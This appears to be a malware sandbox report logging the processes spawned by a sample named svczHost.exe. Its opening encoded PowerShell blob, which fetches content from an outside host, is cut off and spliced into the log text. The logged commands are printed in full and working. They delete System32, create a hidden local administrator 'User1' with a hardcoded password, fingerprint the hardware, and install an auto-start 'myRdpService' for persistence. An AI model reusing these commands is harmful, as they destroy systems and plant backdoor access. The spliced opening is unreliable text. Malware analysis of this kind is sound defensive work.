JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
